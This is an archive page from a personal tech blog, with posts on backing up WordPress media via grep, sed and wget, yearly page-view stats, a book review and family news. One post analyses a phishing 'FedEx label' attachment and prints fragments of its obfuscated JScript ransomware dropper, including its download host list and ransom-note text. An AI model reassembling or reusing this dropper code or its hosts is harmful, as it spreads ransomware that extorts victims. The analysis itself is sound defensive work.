Archive for category Administrivia

Blog Backup: Incremental Media

The recipe for incrementally copying media files since the previous blog backup works like this:

grep attachment_url *xml > attach.txt
sed 's/^.*http/http/' attach.txt | sed 's/<\/wp.*//' > download.txt
wget -nc -w 2 --no-verbose --random-wait --force-directories --directory-prefix=Media/ -i download.txt

The -nc sets the “no clobber” option, which (paradoxically) simply avoids downloading a duplicate of an existing file. Otherwise, it’d download the file and glue on a *.1 suffix, which isn’t a desirable outcome. The myriad (thus far, 0.6 myriad) already-copied files generate a massive stream of messages along the lines of File ‘mumble’ already there; not retrieving.

Adding --no-verbose will cut the clutter and emit some comfort messages.

There seems no way to recursively fetch only newer media files directly from the WordPress file URL with -r -N; the site redirects the http:// requests to the base URL, which doesn’t know about bare media files and coughs up a “not found” error.

Advertisements

Leave a comment

Blog Summary: 2016

Page views for 2016:

Blog Page Views: 2016

Blog Page Views: 2016

That works out to a bit under 1000 page views/day of purely organic traffic.

As always, way more people than I’d expect come here with plumbing problems. On the upside, much of the bedbug saga has fallen off the trailing edge of the wedge; life is good!

4 Comments

Blog Backup

Recent news about Dropbox removing its Public folder feature reminded me to do my every-other-month blog backup. Wordpress provides a method to “export” the blog’s text and metadata in their XML-ish format, so you can (presumably) import your blog into another WordPress instance on the server of your choice. However, the XML file (actually, ten of ’em, all tucked into a paltry 8 MB ZIP file) does not include the media files referenced in the posts, which makes sense.

Now, being that type of guy, I have the original media files (mostly pictures) tucked away in a wide variety of directories on the file server. The problem is that there’s no easy way to match the original file to the WordPress instance; I do not want to produce a table by hand.

Fortunately, the entry for each blog post labels the URL of each media file with a distinct XML tag:

		<wp:attachment_url>https://softsolder.files.wordpress.com/2008/12/cimg2785-blender-bearings.jpg</wp:attachment_url>

Note the two leading tabs: it’s prettyprinted XML. (Also, should you see escaped characters instead of < and >, then WordPress has chewed on the source code again.)

While I could gimmick up a script (likely in Python) to process those files, this is simple enough to succumb to a Bash-style BFH:

grep attachment_url *xml > attach.txt
sed 's/^.*http/http/' attach.txt | sed 's/<\/wp.*//' > download.txt
wget --no-verbose --wait=5 --random-wait --force-directories --directory-prefix=/where/I/put/WordPress/Backups/Media/ -i download.txt

That fetches 6747 media files = 1.3 GB, tucks them into directories corresponding to their WordPress layout, and maintains their original file dates. I rate-limited the download to an average of 5 s/file in the hope of not being banned as a pest, so the whole backup takes the better part of ten hours.

So I wind up blowing an extra gig of disk space on a neatly arranged set of media files that can (presumably) be readily restored to another WordPress instance, should the occasion arise.

Memo to Self: investigate applying the -r option to the base URL, with the -N option to make it incremental, for future updates.

3 Comments

The Thrilling Adventures of Lovelace and Babbage

We’re reading Sydney Padua’s The Thrilling Adventures of Lovelace and Babbage as our evening story, so I gave a Lightning talk at the MHV LUG meeting last week:

MHVLUG – Lovelace and Babbage – Book Report

Earlier versions of the comics graphic novel are on her blog, including several stories that didn’t make the final book cut.

Highly recommended; if you don’t have wet eyes occasionally, you’re entirely too hard-hearted.

You should read Ada’s Analytical Engine Programming Guide; that’s not her title, but that’s what she wrote. If you’ve ever done any assembly language programming, you’ll feel right at home.

Also, get historical documents, commentary, and Analytical Engine emulators (!) at Fourmilab.

Makes me wish I lived in that Pocket Universe, it does:

econ3_005 - Brunel

econ3_005 – Brunel

That picture is ©www.sydneypadua.com, Creative Commons Attribution-NonCommercial 4.0 International License. There exist T-shirts & mugs.

1 Comment

Why Friends Don’t Let Friends Run Windows: Cryptolocker Downloader

Got an email, nominally from one Richard Gilmore of FedEx, concerning a parcel sent as International Next Flight (whatever that is). The Subject line read “We could not deliver your parcel, #00000665103”, although the message didn’t quite match:

Dear Customer,

This is to confirm that one or more of your parcels has been shipped.
Delivery Label is attached to this email.

Kind regards,
Richard Gilmore,
Sr. Delivery Agent.

The email address had nothing to do with FedEx, of course, and my filters tagged it as spam.

The “label” came in a ZIP file: Label_00000665103.zip

Extracting the “label” produced what would look like an MS Word file, if you were so trusting as to hide extensions of “known” filetypes and didn’t worry when you saw a file still sporting a DOC extension: Label_00000665103.doc.wsf

Handing that to VirusTotal produces no surprise at all:

VirusTotal Report

VirusTotal Report

The file contains one very long line, the first chunk of which suggests it’s up to no good:

<job><script language=JScript>var a59253 = '+"HKCU"+cs'; var a59168 = '"); fp.WriteLine(" '; var a5988 = ';} else if('; var a59196 = 'gth;i'; var a59160 = 'fp.W'; var a59261 = 'ion"+c'; var a5999 = 's(f'; var a59254 = '+"SOFTWARE"+';

After a bit of poking, I applied a few minutes of sed reformatting, manual cleanup, and sorting:

sed 's/; var a/;\n/g' Label_00000665103.doc.wsf > lines.txt
... fix a few lines ...
sort -n lines.txt > sort.txt

Which produced a file starting out like this:

<job><script language=JScript>
590 = 'var id="TRIB9RMvAFl04U4Fi7L6RNk9ZowJ2sj_fIrO0WiXGlXd53j6oENCCFDZ9NbVubN-vvJltoR8Wf4_";d';
591 = '="1vcs62wsoYZNc4TdwqgsG5965bDt3mNYW"; var bc="0.52';
592 = '189"; var ld=0;';
593 = ' var cq';
594 = '=S';
595 = 'tri';
596 = 'ng.f';
597 = 'romCharCode(34);';
598 = ' var cs';
599 = '=Strin';
5910 = 'g.fromCh';
5911 = 'ar';
5912 = 'Code(92); var ll';
5913 = '=["32jelen.pl","v';
5914 = 'iktoriascho';
5915 = 'ol.ru","blende';
5916 = 'r.com.br';
5917 = '","pasargad1007.c';
5918 = 'om","www.unit';
5919 = 'ed-systems.it"';
5920 = ']; v';
5921 = 'ar ';
5922 = 'ws=WScript.Cre';
5923 = 'ateObject(';
5924 = '"WScript.Shell';
5925 = '"); v';
5926 = 'ar';
5927 = ' fn=ws';
5928 = '.Expa';
5929 = 'ndEnv';
5930 = 'ironme';
5931 = 'ntString';
... snippage ...

Even without pasting the fragments back together, you can puzzle out the punchline:

59108 = 't",true); fp.Write';
59109 = 'Line("ATTEN';
59110 = 'TION!"); fp.Wr';
59111 = 'ite';
59112 = 'Line(';
59113 = '""); fp.W';
59114 = 'riteLine("All';
59115 = ' your d';
59116 = 'ocuments, p';
59117 = 'hotos';
59118 = ', databases and ot';
59119 = 'her import';
59120 = 'ant ';
59121 = 'pers';
59122 = 'onal fil';
59123 = 'es"); fp.';
59124 = 'Wri';
59125 = 'te';
59126 = 'Line(';
59127 = '"were e';
59128 = 'ncrypted usi';
59129 = 'ng strong RSA-1024';
59130 = ' algorithm with ';
59131 = 'a uniqu';
59132 = 'e key."); fp.Write';
59133 = 'Line(';
59134 = '"To restor';
59135 = 'e your files you h';
59136 = 'ave to pay "+bc+" ';
59137 = 'BTC (bitcoin';
59138 = 's)."); fp.Wri';

Huh. CryptoLocker returns from the dead! Right now, 0.52 BTC = $316.15, so I guess I can drop that into the jar of money saved by running Linux.

If those emails didn’t work so well, they wouldn’t send them…

8 Comments

Monthly Science: Chrysalid Engineer

So then this happened:

Karen - canonical tiger paw graduation picture

Karen – canonical tiger paw graduation picture

Yeah, tanker boots and all; not the weirdest thing we saw during RIT’s graduation ceremonies.

This summer marks her fourth of four co-op semesters with Real Companies Doing Tech Stuff and her final classes end in December; RIT holds one ceremony in the spring and being offset by a semester apparently isn’t all that unusual. She (thinks she) has a job lined up after graduation and doesn’t need her doting father’s help.

But, hey, should you know someone with a way-cool opportunity (*) for a bright, fresh techie who’s increasingly able to build electronic & mechanical gadgets and make them work, drop me a note and I’ll put the two of you in touch. [grin]

(*) If that opportunity should involve 3D printed prosthetics with sensors and motors, she will crawl right out of your monitor…

,

4 Comments

Hiatus

After devoting the last few months to setting up the Makerspace Starter Kit and extracting / organizing / stashing the stuff I wanted to keep:

New parts cabinets

New parts cabinets

I now have some difficulty accomplishing what needs to be done:

Basement Shop - right

Basement Shop – right

During the rest of May I must write a pair of columns, unpack / arrange / reinstall my remaining tools / parts / toys, endure a road trip to our Larval Engineer’s graduation (*), enjoy bicycling with my Lady, and surely repair a few odds-n-ends along the way.

I’ll generate occasional posts through June, after which things should be returning to what passes for normal around here…

(*) For reasons not relevant here, our Larval Engineer’s schedule includes a final co-op and wind-up semester after “graduation”. Perhaps she’s entering the Chrysalis phase of her development?

10 Comments